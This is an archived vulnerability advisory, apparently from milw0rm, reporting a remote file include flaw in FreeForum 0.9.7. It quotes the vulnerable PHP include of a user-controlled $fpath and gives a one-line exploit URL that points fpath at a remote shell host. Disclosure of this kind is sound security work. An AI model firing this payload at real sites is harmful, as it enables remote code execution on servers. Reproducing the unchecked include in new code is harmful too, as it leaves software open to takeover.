TUCoPS :: Web BBS :: etc :: b06-5096.htm

FreeForum 0.9.7 (fpath) Remote File Include Vulnerability
FreeForum 0.9.7 (fpath) Remote File Include Vulnerability
FreeForum 0.9.7 (fpath) Remote File Include Vulnerability


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
FreeForum 0.9.7 (fpath) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Discovered by XORON(turkish hacker)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
URL: http://www.ezforum.de/downloads/Forum.zip (229kb) 

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Vuln. Code: in forum.php.

if(!isset($cfg_file))$cfg_file="config/config.inc.php";
if(!isset($fpath))$fpath=".";
if(!isset($getvar))$getvar='';
include("$fpath/lib/php/classes.php");

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Exploit: /forum.php?cfg_file=1&fpath=http://sh3LL? 

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA, O.G,

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# milw0rm.com [2006-10-07]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH